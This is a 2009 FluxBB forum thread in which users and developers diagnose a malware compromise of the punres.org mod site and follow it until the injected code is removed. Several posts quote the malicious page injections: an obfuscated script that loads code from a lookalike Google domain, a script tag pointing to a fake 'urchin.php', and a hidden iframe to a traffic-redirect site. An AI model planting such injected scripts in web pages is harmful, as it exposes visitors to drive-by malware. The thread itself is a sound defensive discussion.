Forums

Unfortunately no one can be told what FluxBB is - you have to see it for yourself.

You are not logged in.

#1 2009-08-07 16:57:57

joe.banana
Member
From: sun
Registered: 2009-04-25
Posts: 95

Punres.ORG infected with Malware?

Hello everyone,

Whenever I visit punres.org my AV pops up warning me of malware from this site.

Specifically HEUR/HTML.Malware and then SWF/Drop.Small.WC on Avira..

Anyone else getting troubles from the said site or this is just false alarm?

Offline

#2 2009-08-07 17:48:53

Reines
Lead developer
From: Scotland
Registered: 2008-05-11
Posts: 3,163
Website

Re: Punres.ORG infected with Malware?

I wonder if it's anything to do with the rather weird looking:

<script type="text/javascript"><!--
document.write("<img src='http://208.88.226.75/log.php?id=3&r=" + Math.round(100000 * Math.random()) + "' alt=''/>");
--></script> 

on each of their pages :s

Though SWF/Drop.Small.WC sounds like something trying to exploit an swf vulnerability, and I don't see anything like that there.

Offline

#3 2009-08-07 17:56:48

hcgtv
Member
From: Charlotte, NC
Registered: 2008-05-07
Posts: 419
Website

Re: Punres.ORG infected with Malware?

avast! has been going crazy on Punres for the last few days, I think it was a malicious ad that was causing the problem.


Bert Garcia - When all you have is a keyboard

Offline

#4 2009-08-07 20:49:43

Smartys
Former Developer
Registered: 2008-04-27
Posts: 3,135
Website

Re: Punres.ORG infected with Malware?

Sounds like they got defaced. yikes

Offline

#5 2009-08-07 22:32:36

Reines
Lead developer
From: Scotland
Registered: 2008-05-11
Posts: 3,163
Website

Re: Punres.ORG infected with Malware?

There's some rather weird code on Punres too which looks like it's trying to do something undesirable.

<script type="text/javascript"> 
function advQuery(){
var Host="http://google.com/";
alert(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+unescape("%63%6F%6D")+"/if.php' type='text/javascript'%3E%3C/script%3E"));
};advQuery();</script>

It basically includes a js script (which seems to be down now) from

http://go00gle.com/if.php

Offline

#6 2009-08-08 16:36:09

joe.banana
Member
From: sun
Registered: 2009-04-25
Posts: 95

Re: Punres.ORG infected with Malware?

So nobody is fixing it? It's been like that for almost a week now i think..

Last edited by joe.banana (2009-08-08 16:36:33)

Offline

#7 2009-08-08 16:43:26

Franz
Lead developer
From: Germany
Registered: 2008-05-13
Posts: 4,054
Website

Re: Punres.ORG infected with Malware?

That would be Kristoffer's task, I believe. You'd have to contact him.


fluxbb.de | develoPHP

"As code is more often read than written it's really important to write clean code."

Offline

#8 2009-08-08 18:19:54

Reines
Lead developer
From: Scotland
Registered: 2008-05-11
Posts: 3,163
Website

Re: Punres.ORG infected with Malware?

joe.banana wrote:

So nobody is fixing it? It's been like that for almost a week now i think..

Punres isn't official and isn't run by us, you'd need to contact the owner of it.

Offline

#9 2009-08-08 18:40:29

Smartys
Former Developer
Registered: 2008-04-27
Posts: 3,135
Website

Re: Punres.ORG infected with Malware?

I sent him an email, I don't know if he'll respond/read it.

Offline

#10 2009-08-10 20:35:38

Smartys
Former Developer
Registered: 2008-04-27
Posts: 3,135
Website

Re: Punres.ORG infected with Malware?

He has responded and removed the offendending code.

Offline

#11 2009-08-13 17:24:48

joe.banana
Member
From: sun
Registered: 2009-04-25
Posts: 95

Re: Punres.ORG infected with Malware?

Thanks for updating us! smile need some mods there

Offline

#12 2009-08-14 14:25:45

bgiddins
Member
Registered: 2008-08-17
Posts: 54

Re: Punres.ORG infected with Malware?

Punres is now down...

Offline

#13 2009-08-14 20:03:39

Kristoffer
Former Developer
Registered: 2008-04-29
Posts: 92

Re: Punres.ORG infected with Malware?

And it probably will be a few days because everything went haywire when I was moving some stuff around. DreamHost is working on it, but I can't do much else.

Offline

#14 2009-09-21 16:31:09

Koos
Member
Registered: 2008-05-09
Posts: 71
Website

Re: Punres.ORG infected with Malware?

Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a month now. I tried to contact Kristoffer and StevenBullen about this but got no response. Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.

Offline

#15 2009-09-22 04:38:31

StevenBullen
Member
Registered: 2008-05-03
Posts: 256
Website

Re: Punres.ORG infected with Malware?

I will speak to him about getting the Stats/Style part either removed or updated. Probably removed.

Koos wrote:

Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a
month now. I tried to contact Kristoffer and StevenBullen about this but got no response.

No one is maintaining it, if any problems occur then I can chase up Kristoffer.

Why did you not just raise a topic on PunRes as I check it every other day? Plus I just tested my blog contact button and that worked fine, also mailed myself on PunRes and that worked fine. So not sure how your message did not get to me.

Koos wrote:

Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.

Compatible, yes. Good Quality, not all of them.

If you check out this particular post it will explain the 'mod repository' situation. wink
http://fluxbb.org/forums/post/25385/#p25385

Last edited by StevenBullen (2009-09-22 04:39:01)

Offline

#16 2009-09-29 19:00:53

Franz
Lead developer
From: Germany
Registered: 2008-05-13
Posts: 4,054
Website

Re: Punres.ORG infected with Malware?

Seems like they're still infected - or again.


fluxbb.de | develoPHP

"As code is more often read than written it's really important to write clean code."

Offline

#17 2009-09-30 07:09:56

StevenBullen
Member
Registered: 2008-05-03
Posts: 256
Website

Re: Punres.ORG infected with Malware?

lie2815 wrote:

Seems like they're still infected - or again.

Any chance of some more information? like are you having the exact same problem as above?

Offline

#18 2009-09-30 09:34:16

Franz
Lead developer
From: Germany
Registered: 2008-05-13
Posts: 4,054
Website

Re: Punres.ORG infected with Malware?

No, I clicked on some link to a mod on PunRes and AVG popped up and warned me about a threat.


fluxbb.de | develoPHP

"As code is more often read than written it's really important to write clean code."

Offline

#19 2009-09-30 14:30:45

Nickrober
Member
Registered: 2009-09-08
Posts: 7

Re: Punres.ORG infected with Malware?

Here's what happens whenever I visit:

5czCrUaV95TUJ577wSKCcFc41BDqBPsb_m.png

Offline

#20 2009-09-30 21:18:05

sirena
Member
From: AU
Registered: 2008-05-10
Posts: 172

Re: Punres.ORG infected with Malware?

Yeah, look at the HTML souce for the punres.org home page:

<script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>

has been inserted just below the legitimate google-analytics.com code block for the site stats.

query-google.com points back to 82.146.52.145 which is hosted in the US but belongs to a Russian company ostensibly from Irkutsk.

That code shouldn't be there on punres.org.

Also note that the punres home page doesn't validate at W3C:

Sorry, I am unable to validate this document because on line 197 it contained one or more bytes that I cannot interpret as utf-8 (in other words, the bytes found are not valid values in the specified Character Encoding). Please check both the content of the file and the character encoding indication.

The error was: utf8 "\xD0" does not map to Unicode

Offline

#21 2009-10-01 06:51:06

StevenBullen
Member
Registered: 2008-05-03
Posts: 256
Website

Re: Punres.ORG infected with Malware?

I will inform Jansson. Cheers sirena. wink

Offline

#22 2009-10-01 07:49:08

Reines
Lead developer
From: Scotland
Registered: 2008-05-11
Posts: 3,163
Website

Re: Punres.ORG infected with Malware?

If this is the second time it's been infected it sounds like something running isn't up-to-date, or theres at least some underlying problem that needs fixed.

Offline

#23 2009-10-09 00:29:37

sirena
Member
From: AU
Registered: 2008-05-10
Posts: 172

Re: Punres.ORG infected with Malware?

The malicious code is still at the bottom of the punres.org home page.

To recap, the problem code is this link at the bottom of the page:

 <script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>

That bogus urchin.php page contains the following Javascript code that invisibly writes an iframe:

document.write("<iframe src=\"http://www.step-traff.info/intraf.php?kod=954815&site=www.entervoid.com\" style=display:none></iframe>");

the code of which I expect varies from time to time.

Offline

#24 2009-11-15 15:52:30

Cyclone103
Member
From: Antarctica
Registered: 2008-10-10
Posts: 46
Website

Re: Punres.ORG infected with Malware?

My site was similarly infected once. Try placing <!-- before the closing body tag. When the JS injects itself, boom, commented out. It's a temporary fix to be sure, but it works.

Offline

#25 2009-11-15 16:33:16

Scripter
Member
Registered: 2008-05-10
Posts: 92
Website

Re: Punres.ORG infected with Malware?

It was fixed today smile


Choose a career you love, and you'll never have to work a day in your life.

Offline

Board footer

Powered by FluxBB 1.5.0